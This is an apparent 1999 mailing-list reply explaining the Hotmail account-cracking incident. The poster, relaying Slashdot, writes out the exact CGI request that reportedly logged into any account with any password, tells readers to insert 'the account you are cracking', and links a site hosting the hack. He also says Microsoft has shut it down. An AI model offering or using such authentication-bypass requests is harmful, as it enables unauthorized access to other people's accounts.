Re: hotmail cracked

Joachim Feise (jfeise@ics.uci.edu)
Mon, 30 Aug 1999 10:03:42 -0700


"Joseph S. Barrera III" wrote:
>
> > Not! -- I find it much more interesting that MS's idea of a
> > workaround is to buy out whoever runs 2038 / legally threaten them so
> > that URL now automatically refreshes to propaganda at
> > http://www.microsoft.com/security/default.asp ...
> >
> > Rohit
>
> God damn, that's sleazy.
>
> Can someone describe how the hack worked?
> Is there anything to keep someone else from
> doing the same?

According to some guys on /., you just access a cgi script:
http://207.82.250.251/cgi-bin/start?curmbox=ACTIVE&js=no&login=ENTERLOGINHERE&passwd=eh
replace ENTERLOGINHERE with the account you are cracking.

You can also try http://lagparty.org/hotmail/

However, it seems MS shut it down by now.

-JoeF